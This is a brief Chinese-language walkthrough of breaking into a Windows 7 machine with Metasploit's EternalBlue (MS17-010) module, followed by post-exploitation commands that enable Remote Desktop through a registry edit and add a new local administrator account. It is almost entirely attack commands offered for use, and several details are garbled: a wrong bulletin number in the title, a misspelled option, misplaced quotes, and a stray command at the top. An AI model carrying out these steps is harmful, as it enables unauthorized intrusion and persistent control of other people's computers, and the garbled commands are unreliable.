利用ms07-01 msf入侵win7

#msfconsole

 

net localgroup administrators xx /add

 2. search ms17-10

 

 

 3. use  exploit/windows/smb/ms17_010_eternalblue

 

4.set rhosts 192.168.0.113

  set  lhosts 192.168.0.117

 

 

5.查看一下

 

 6 exploit

好厉害的漏洞啊，直接拿到了shell

 

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

添加个系统管理用户

net user xx xx  /add

net localgroup administrators xx /add